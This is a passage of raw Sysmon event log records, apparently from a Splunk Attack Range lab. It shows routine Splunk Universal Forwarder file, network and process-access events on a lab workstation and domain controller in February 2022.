Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C01730F1002841F905921EB82D3177A,SHA256=37F38AC012F67877177A77A50829DD2B34726ACAED380F4857AEF47C7F6E3342,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:09.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEFC486094F24BAFA8F948402CEE6F32,SHA256=713447C2BAB54D457506701FD11E81F65C6B33C7FD0F7FE56B0CBD1E45447DC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:10.068{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C055B8B2029F7F7995A0700EBD8FA9C,SHA256=D5AE1218ECCD6F069F55CB2A92371E7C6D1BDC1DFEC8B44DFD901D045A49BA8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:08.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53527-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:10.128{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F5BA268C32F21DF64C2C4238AB880FC,SHA256=87E84D39763811716AD4D76FC5718A302546E4922BA6308E271A3913C353899C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:11.270{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3FAB8096EE7065722645682DE95E65E,SHA256=216F79888B02437FD111BCBE5D7518C1009742770037E3E81D086B7BAC0DE236,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:11.143{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D24400B6332F894E402592CD6B8522CA,SHA256=9211582A3CA82BC9A444F0F9F0F2E88D10B7C0DB952FAE034D2EB2215998D330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:12.317{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA8F0C0C38F511E8C0CFFB7E9D360F69,SHA256=07AF1D732485987796923D823B5C3C7116DFB936DFDCBE5C0577B02B7C93933A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:12.174{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8CDAAB0CF514512769923E092B958FF,SHA256=FE58323549B37FC49301AC8A97630A9437FB6FA2BF62E4A4E78C55AFBFF6F675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:13.347{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C51EB0062007682A4B0DD1F6622003,SHA256=2EADF58F74398799EB4F49339A4CDA139E3BB73FB66A61D15A9FE7FB5F8FD324,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:13.193{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DD1035D117B6A6D5DC17FBAD17FAC2E,SHA256=1B1331A64638A360852D519241627491110FC228702F68148BE3DDEFB7B6BCF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:12.667{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51381-false10.0.1.12-8000- 23542300x8000000000000000217254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:14.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F903101BED272EE29F7428B63ECAE9F9,SHA256=CA1ED041C64C77BF5DF8E045163E0042C9455A490C78919F5693DD2E450D0780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:14.209{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ECB66BF6CFE36FC518225A8A3F73D25,SHA256=0C8A37E192112AD72F243509D1B72A6A7EB2C480A82DC72C28FA45670B2F29EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:15.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D957A01A32BF39A33105B0436527467E,SHA256=BF71F0238F306734D903F622A633352FC2926AF3D636481939B3DDAEB819431A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:13.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53528-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:15.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A50C99A6507DC93D3A64CFFCA15C03,SHA256=245E1410A4AA0DCAFB1D8331CEC7F673088584EE597FE49C09AFC620650F6A38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:16.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FE89519B18EF4C2C297FD692898F7A7,SHA256=74498FEE9211A14C535FE2772CC3837E32F1A79C63151C0683733FF204F90728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:16.290{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5055BC357AA8665C1C82241BE061FDF,SHA256=72395E936906EA6A1C8642D292A0E42CFD7CBBD34DC00F97F7829E9D2A1AF339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:17.673{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6359CDE83EF3DC8C93702F26552C093,SHA256=7773C5ECC8E4B5E494D33418C7F0001E1207517681E46CD76E32F9BD3DDC4825,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:17.307{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A756F9E518A7C50E976D36B4F1E66174,SHA256=A1C93D7AB87EDDBF580FE7157386CD13A92E79D43CE78D78FDF482D3A519374F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:18.766{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E114E8393538DAF85753054E764CDBEF,SHA256=2C2000BB9936C863F92E80FBD14894220E77CB78664D25AE9DF62CB5650B4F70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:18.338{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A55D8D258FBD6609336900EF48526AD,SHA256=E468F02F95CEF8740709F2B9E5227E262769AACD9A679879225834C27296CC76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:19.906{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E339B354186EF5E310AE7DA164C81A98,SHA256=A1ADA75EF5A9BFE9B05313C205E0D603FDAA47E2DE2B8549AB1B76362B2C562F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.753{C8EA50B7-125B-6216-3505-000000003802}67646756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.390{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-125B-6216-3505-000000003802}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.388{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.388{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.388{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.388{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.388{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-125B-6216-3505-000000003802}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.387{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-125B-6216-3505-000000003802}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.386{C8EA50B7-125B-6216-3505-000000003802}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:19.368{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=173887BC812121D4C51908D7D89A1360,SHA256=623F19B2440E1446C79674BA401C8674A5F7A61FABD6BC28B093F4D7328D651E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:20.937{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C824131FE77988C9B6F034AFA5F52493,SHA256=3CC4541BF9EAF1D6F02039E9F30CB3869EA4421889D313E350467D912405A2C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.870{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-125C-6216-3705-000000003802}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.854{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.854{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.854{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 